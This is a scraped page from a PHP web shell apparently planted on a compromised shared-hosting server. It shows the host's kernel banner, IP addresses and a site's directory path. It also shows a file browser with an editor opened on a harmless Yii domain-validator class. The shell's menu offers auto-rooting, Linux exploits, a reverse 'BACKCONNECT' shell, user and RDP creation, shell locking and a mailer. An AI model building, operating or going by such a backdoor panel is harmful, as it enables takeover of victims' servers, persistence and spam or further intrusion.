Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
letaweb /
admin /
validators /
[ HOME SHELL ]
Name
Size
Permission
Action
CompositeExistValidator.php
9.69
KB
-rw----r--
ConfirmPasswordValidator.php
365
B
-rw----r--
DomainValidator.php
1.1
KB
-rw----r--
PasswordValidator.php
3.02
KB
-rw----r--
SubDomainValidator.php
1.1
KB
-rw----r--
UserActivedValidator.php
3.03
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DomainValidator.php
<?php class DomainValidator extends CValidator { public $type; public $pattern = '/^(([A-Z0-9][A-Z0-9_-]*)(\.[A-Z0-9][A-Z0-9_-]*)+)/i'; protected function validateAttribute($object, $attribute) { $value = $object->$attribute; $val = $this->validateValue($value); if ($val == false) { $message = (null !== $this->message) ? $this->message : Yii::t('yii', '{attribute} is not a valid Domain.'); $this->addError($object, $attribute, $message); return; } $val = checkdnsrr("$value", $this->type); if ($val != 1) { $message = (null !== $this->message) ? $this->message : Yii::t('yii', '{attribute} is not a valid Domain.'); $this->addError($object, $attribute, $message); } } public function validateValue($value) { if (is_string($value) && strlen($value) < 2000) { // make sure the length is limited to avoid DOS attacks if (preg_match($this->pattern, $value)) { return $value; } } return false; } }
Close